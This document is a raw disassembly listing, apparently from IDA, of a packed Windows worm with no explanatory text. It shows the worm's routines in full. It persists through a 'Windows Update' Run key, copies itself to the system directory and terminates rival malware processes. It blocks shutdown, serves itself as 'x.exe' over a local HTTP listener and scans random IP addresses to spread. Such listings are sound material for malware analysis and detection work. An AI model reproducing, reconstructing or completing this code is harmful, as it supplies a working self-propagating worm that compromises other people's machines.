push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_310010B0 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_31001098
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31001A04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A5A proc near ; CODE XREF: sub_3100202D+3E�p
; sub_310020F4+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3100114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31001A7B
call dword_31001150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31001A7B: ; CODE XREF: sub_31001A5A+15�j
lea eax, [ebp+var_34]
push eax
call dword_31001154 ; gethostbyname
test eax, eax
jnz short loc_31001A90
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31001A90: ; CODE XREF: sub_31001A5A+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31001A5A endp
; =============== S U B R O U T I N E =======================================
sub_31001A99 proc near ; CODE XREF: sub_31001F41+22�p
; sub_31001FA5+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31001134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31001A99 endp
; =============== S U B R O U T I N E =======================================
sub_31001AAF proc near ; CODE XREF: sub_31001E06+40�p
; sub_31001E06+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_310010B8 ; OpenEventA
test eax, eax
jz short locret_31001AC8
push eax
call dword_310010B4 ; SetEvent
locret_31001AC8: ; CODE XREF: sub_31001AAF+10�j
retn
sub_31001AAF endp
; =============== S U B R O U T I N E =======================================
sub_31001AC9 proc near ; CODE XREF: UPX0:31002B69�p
push esi
mov esi, dword_310010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31001AC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001ADF proc near ; DATA XREF: sub_31001C18+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31001B10
push 1
jmp loc_31001BCB
; ---------------------------------------------------------------------------
loc_31001B10: ; CODE XREF: sub_31001ADF+28�j
mov esi, dword_310010F4
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
mov esi, dword_31001168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31004FC0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31002B92 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31001B8D: ; CODE XREF: sub_31001ADF+E8�j
mov eax, dword_31004FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31001B9F
mov eax, ecx
loc_31001B9F: ; CODE XREF: sub_31001ADF+BC�j
test eax, eax
jz short loc_31001BEC
push 0
push eax
mov eax, dword_31004FB8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31001BC9
cmp eax, 1000h
jb short loc_31001BEC
push 64h
add edi, eax
call dword_31001080 ; Sleep
jmp short loc_31001B8D
; ---------------------------------------------------------------------------
loc_31001BC9: ; CODE XREF: sub_31001ADF+D5�j
push 2
loc_31001BCB: ; CODE XREF: sub_31001ADF+2C�j
pop eax
jmp short loc_31001C11
; ---------------------------------------------------------------------------
loc_31001BCE: ; CODE XREF: sub_31001ADF+49�j
; sub_31001ADF+61�j
mov esi, dword_31001168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31004A80
push ebx
call esi ; send
loc_31001BEC: ; CODE XREF: sub_31001ADF+C2�j
; sub_31001ADF+DC�j
push 7D0h
call dword_31001080 ; Sleep
push 2
push ebx
call dword_31001170 ; shutdown
push ebx
call dword_31001174 ; closesocket
push 0
call dword_310010BC ; ExitThread
xor eax, eax
loc_31001C11: ; CODE XREF: sub_31001ADF+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001C18 proc near ; DATA XREF: sub_31001E06+DE�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_3100195C
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31004FBC, ebx
call sub_31002264
add esp, 14h
test eax, eax
jnz loc_31001D4D
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_310010C8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31001C84
push 1
call dword_310010BC ; ExitThread
loc_31001C84: ; CODE XREF: sub_31001C18+62�j
push ebx
push esi
call dword_310010C4 ; GetFileSize
push eax
mov dword_31004FC0, eax
call sub_31002680
pop ecx
mov dword_31004FB8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31004FC0
push eax
push esi
call dword_310010C0 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31004FC0, eax
call dword_31001098 ; CloseHandle
push ebx
push 1
push 2
call dword_31001158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31002B8C ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31001CE6: ; CODE XREF: sub_31001C18+E5�j
; sub_31001C18+ED�j ...
call dword_310010F8 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31004FCC, eax
jz short loc_31001CE6
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31001CE6
push eax
call dword_31001160 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31001140 ; bind
test eax, eax
jnz short loc_31001CE6
push 64h
push edi
call dword_31001144 ; listen
mov [ebp+var_8], esi
pop esi
loc_31001D2F: ; CODE XREF: sub_31001C18+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31001148 ; accept
push eax
push offset sub_31001ADF
call sub_310019B3
pop ecx
pop ecx
jmp short loc_31001D2F
; ---------------------------------------------------------------------------
loc_31001D4D: ; CODE XREF: sub_31001C18+3D�j
push ebx
call dword_310010BC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31001C18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001D5C proc near ; CODE XREF: sub_31001E06:loc_31001EDE�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3100113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31001D5C endp
; ---------------------------------------------------------------------------
loc_31001D88: ; CODE XREF: UPX1:31006C28�j
push 0
call dword_310010A0 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31004FD0, eax
call dword_310010D4 ; DeleteFileA
call sub_3100195C
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
call dword_310010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31001DCA
push 1
call dword_310010CC ; ExitProcess
loc_31001DCA: ; CODE XREF: UPX0:31001DC0�j
call sub_310017C9
call sub_310023C8
call sub_31002542
push offset sub_31001E06
call sub_31001851
test eax, eax
pop ecx
jz short loc_31001DEF
push 0
call sub_31001E06
loc_31001DEF: ; CODE XREF: UPX0:31001DE6�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31001DF2 proc near ; CODE XREF: sub_31001E06:loc_31001F07�p
; sub_31001F41:loc_31001F5A�p ...
push 0
push dword_31004FC8
call dword_310010D8 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31001DF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001E06 proc near ; CODE XREF: UPX0:31001DEA�p
; DATA XREF: UPX0:31001DD9�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31001180
push offset loc_31002BD0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13x ; "u13x"
xor edi, edi
push edi
push 1
push edi
call dword_310010DC ; CreateEventA
mov dword_31004FC8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_3100198A
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31001EDE
push offset aWs2_32 ; "ws2_32"
mov esi, dword_31001090
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
loc_31001EDE: ; CODE XREF: sub_31001E06+9D�j
call sub_31001D5C
push edi
push offset sub_31001C18
call sub_31001999
push edi
push offset loc_31002B40
call sub_31001999
push edi
push offset loc_31002150
call sub_31001999
add esp, 18h
loc_31001F07: ; CODE XREF: sub_31001E06+11C�j
call sub_31001DF2
test eax, eax
jnz short loc_31001F24
push edi
call dword_31001018 ; AbortSystemShutdownA
push 1388h
call dword_31001080 ; Sleep
jmp short loc_31001F07
; ---------------------------------------------------------------------------
loc_31001F24: ; CODE XREF: sub_31001E06+108�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001E06 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001F41 proc near ; DATA XREF: sub_31001FA5+55�o
; sub_3100202D+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31001F50
push 1
pop eax
jmp short locret_31001FA1
; ---------------------------------------------------------------------------
loc_31001F50: ; CODE XREF: sub_31001F41+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31001F5A: ; CODE XREF: sub_31001F41+5A�j
call sub_31001DF2
test eax, eax
jnz short loc_31001F9D
call sub_31001A99
test eax, eax
jz short loc_31001F9D
cmp [ebp+var_1], bl
jz short loc_31001F96
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31001262
movzx esi, word_31004FDC
pop ecx
call dword_310010F8 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31001080 ; Sleep
loc_31001F96: ; CODE XREF: sub_31001F41+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31001F5A
loc_31001F9D: ; CODE XREF: sub_31001F41+20�j
; sub_31001F41+29�j
pop esi
xor eax, eax
pop ebx
locret_31001FA1: ; CODE XREF: sub_31001F41+D�j
leave
retn 4
sub_31001F41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001FA5 proc near ; DATA XREF: sub_3100202D+7E�o
; UPX0:310021E5�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31001FB3
push 1
pop eax
jmp short loc_31002029
; ---------------------------------------------------------------------------
loc_31001FB3: ; CODE XREF: sub_31001FA5+7�j
push ebx
push esi
push edi
call sub_3100195C
mov esi, dword_310010F8
xor ebx, ebx
loc_31001FC3: ; CODE XREF: sub_31001FA5+7D�j
call sub_31001DF2
test eax, eax
jnz short loc_31002024
call sub_31001A99
test eax, eax
jz short loc_31002024
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31004FD4
mov byte ptr [ebp+arg_0+3], al
call dword_310010E0 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31001262
test eax, eax
pop ecx
jnz short loc_31002006
push [ebp+arg_0]
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_31002006: ; CODE XREF: sub_31001FA5+50�j
movzx edi, word_31004FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31001080 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31001FC3
loc_31002024: ; CODE XREF: sub_31001FA5+25�j
; sub_31001FA5+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31002029: ; CODE XREF: sub_31001FA5+C�j
pop ebp
retn 4
sub_31001FA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100202D proc near ; DATA XREF: UPX0:310021FD�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_3100195C
call sub_31001DF2
test eax, eax
jnz loc_310020E6
push ebx
mov ebx, dword_31001080
push esi
mov esi, dword_310010F8
push edi
loc_31002053: ; CODE XREF: sub_3100202D+48�j
; sub_3100202D+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31002062: ; CODE XREF: sub_3100202D+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31002062
call sub_31001A5A
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31002053
call sub_31001A99
test eax, eax
jz short loc_310020BE
push offset dword_31004FD4
call dword_310010E0 ; InterlockedIncrement
push edi
call sub_31001262
test eax, eax
pop ecx
jnz short loc_310020C5
push edi
push offset sub_31001F41
call sub_310019B3
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_310020AA: ; CODE XREF: sub_3100202D+8D�j
push edi
push offset sub_31001FA5
call sub_310019B3
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_310020AA
jmp short loc_310020C5
; ---------------------------------------------------------------------------
loc_310020BE: ; CODE XREF: sub_3100202D+51�j
push 2710h
call ebx ; Sleep
loc_310020C5: ; CODE XREF: sub_3100202D+67�j
; sub_3100202D+8F�j
movzx edi, word_31004FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31001DF2
test eax, eax
jz loc_31002053
pop edi
pop esi
pop ebx
loc_310020E6: ; CODE XREF: sub_3100202D+11�j
push 0
call dword_310010BC ; ExitThread
xor eax, eax
leave
retn 4
sub_3100202D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310020F4 proc near ; CODE XREF: UPX0:310021C2�p
; UPX0:loc_31002228�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31001A5A
push eax
call dword_3100115C ; inet_ntoa
mov esi, dword_31001078
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push dword_31004FCC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3100111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31004002
call esi ; lstrcpy
push offset byte_31004000
call dword_3100107C ; lstrlen
mov byte_31004000[eax], 0DFh
pop esi
leave
retn
sub_310020F4 endp
; ---------------------------------------------------------------------------
loc_31002150: ; DATA XREF: sub_31001E06+F4�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31004FD4, ebx
call sub_31001A99
mov esi, dword_31001080
mov edi, 1388h
test eax, eax
jnz short loc_3100217E
loc_31002172: ; CODE XREF: UPX0:3100217C�j
push edi
call esi ; Sleep
call sub_31001A99
test eax, eax
jz short loc_31002172
loc_3100217E: ; CODE XREF: UPX0:31002170�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31001134 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31004FD8, ebx
pop ebp
mov word_31004FDC, 96h
jz short loc_310021BB
mov dword_31004FD8, 1
mov ebp, 15Eh
mov word_31004FDC, 14h
loc_310021BB: ; CODE XREF: UPX0:310021A1�j
call sub_31001A5A
mov ebx, eax
call sub_310020F4
cmp ebx, 100007Fh
jz short loc_310021DC
push ebx
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_310021DC: ; CODE XREF: UPX0:310021CD�j
mov dword ptr [esp+10h], 4
loc_310021E4: ; CODE XREF: UPX0:310021F5�j
push ebx
push offset sub_31001FA5
call sub_310019B3
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_310021E4
test ebp, ebp
jle short loc_3100220C
loc_310021FB: ; CODE XREF: UPX0:3100220A�j
push 0
push offset sub_3100202D
call sub_310019B3
pop ecx
dec ebp
pop ecx
jnz short loc_310021FB
loc_3100220C: ; CODE XREF: UPX0:310021F9�j
; UPX0:31002218�j ...
call sub_31001A99
test eax, eax
jz short loc_3100221A
push edi
call esi ; Sleep
jmp short loc_3100220C
; ---------------------------------------------------------------------------
loc_3100221A: ; CODE XREF: UPX0:31002213�j
; UPX0:31002226�j
call sub_31001A99
test eax, eax
jnz short loc_31002228
push edi
call esi ; Sleep
jmp short loc_3100221A
; ---------------------------------------------------------------------------
loc_31002228: ; CODE XREF: UPX0:31002221�j
call sub_310020F4
jmp short loc_3100220C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100222F proc near ; CODE XREF: sub_310023C8+8C�p
; sub_31002542+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31002262
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
loc_31002262: ; CODE XREF: sub_3100222F+1C�j
pop ebp
retn
sub_3100222F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002264 proc near ; CODE XREF: sub_31001C18+33�p
; sub_310023C8+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jz short loc_31002290
push 1
pop eax
jmp short loc_310022BA
; ---------------------------------------------------------------------------
loc_31002290: ; CODE XREF: sub_31002264+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31001008 ; RegQueryValueExA
test eax, eax
jz short loc_310022AF
push 2
pop esi
loc_310022AF: ; CODE XREF: sub_31002264+46�j
push [ebp+arg_10]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_310022BA: ; CODE XREF: sub_31002264+2A�j
pop esi
leave
retn
sub_31002264 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310022BD proc near ; CODE XREF: sub_31002476+96�p
; sub_31002542+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001000 ; RegCreateKeyExA
test eax, eax
jz short loc_310022E6
push 1
pop eax
jmp short loc_3100230D
; ---------------------------------------------------------------------------
loc_310022E6: ; CODE XREF: sub_310022BD+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001004 ; RegSetValueExA
test eax, eax
jz short loc_31002302
push 2
pop esi
loc_31002302: ; CODE XREF: sub_310022BD+40�j
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_3100230D: ; CODE XREF: sub_310022BD+27�j
pop esi
pop ebp
retn
sub_310022BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002310 proc near ; CODE XREF: sub_310023C8+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_3100107C ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_310023C4
loc_31002330: ; CODE XREF: sub_31002310+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31002339
dec esi
jns short loc_31002330
loc_31002339: ; CODE XREF: sub_31002310+24�j
push 0
push 2
call sub_31002BE8 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_310023C4
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31002B8C ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31002BE2 ; Process32First
test eax, eax
jz short loc_310023C4
lea esi, [esi+ebx+1]
loc_31002381: ; CODE XREF: sub_31002310+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_310010F4 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_310023B1
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_3100109C ; OpenProcess
push 0
push eax
call dword_31001070 ; TerminateProcess
loc_310023B1: ; CODE XREF: sub_31002310+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31002BDC ; Process32Next
test eax, eax
jnz short loc_31002381
loc_310023C4: ; CODE XREF: sub_31002310+1A�j
; sub_31002310+38�j ...
pop esi
pop ebx
leave
retn
sub_31002310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310023C8 proc near ; CODE XREF: UPX0:31001DCF�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31002431: ; CODE XREF: sub_310023C8+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jnz short loc_31002468
push ebx
push edi
push esi
call sub_3100222F
lea eax, [ebp+var_138]
push eax
call sub_31002310
add esp, 10h
loc_31002468: ; CODE XREF: sub_310023C8+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31002431
pop edi
pop esi
pop ebx
leave
retn
sub_310023C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002476 proc near ; CODE XREF: sub_31002542+D1�p
; sub_31002542+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3100248B
push [ebp+arg_0]
call dword_310010D4 ; DeleteFileA
loc_3100248B: ; CODE XREF: sub_31002476+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31001058 ; GetSystemDirectoryA
test eax, eax
jz locret_31002540
push esi
call dword_310010F8 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_310019D4
mov esi, dword_3100105C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset asc_31004CAC ; "\\"
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31001060 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_3100107C ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_310022BD
add esp, 14h
push dword_31004FC4
call dword_31001098 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31001064 ; WinExec
push 1F4h
call dword_31001080 ; Sleep
push 0
call dword_310010CC ; ExitProcess
pop esi
locret_31002540: ; CODE XREF: sub_31002476+23�j
leave
retn
sub_31002476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002542 proc near ; CODE XREF: UPX0:31001DD4�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31001050 ; GetModuleFileNameA
test eax, eax
jz loc_3100267B
and dword_31004FE0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jz short loc_310025C8
call dword_310010F8 ; rand
push 0Ah
mov ebx, offset aDzzqpbftouhfbx ; "dzzqpbftouhfbx"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_310019D4
pop ecx
pop ecx
push ebx
call dword_3100107C ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_310022BD
add esp, 14h
jmp short loc_310025D7
; ---------------------------------------------------------------------------
loc_310025C8: ; CODE XREF: sub_31002542+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDzzqpbftouhfbx ; "dzzqpbftouhfbx"
call dword_31001078 ; lstrcpy
loc_310025D7: ; CODE XREF: sub_31002542+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31002264
add esp, 14h
